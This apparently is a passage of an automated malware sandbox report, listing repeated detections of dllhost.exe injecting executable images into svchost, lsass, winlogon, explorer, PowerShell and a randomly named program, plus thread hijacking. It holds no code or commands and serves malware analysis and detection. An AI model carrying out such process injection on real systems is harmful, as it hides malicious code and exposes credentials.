Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1D865090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 199015D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 188D6710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29F37400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 32F0000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 32F0000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2844
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 5968 1
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 2F00000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 947DB66010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17184260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DCCA00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 14D83F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B927050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
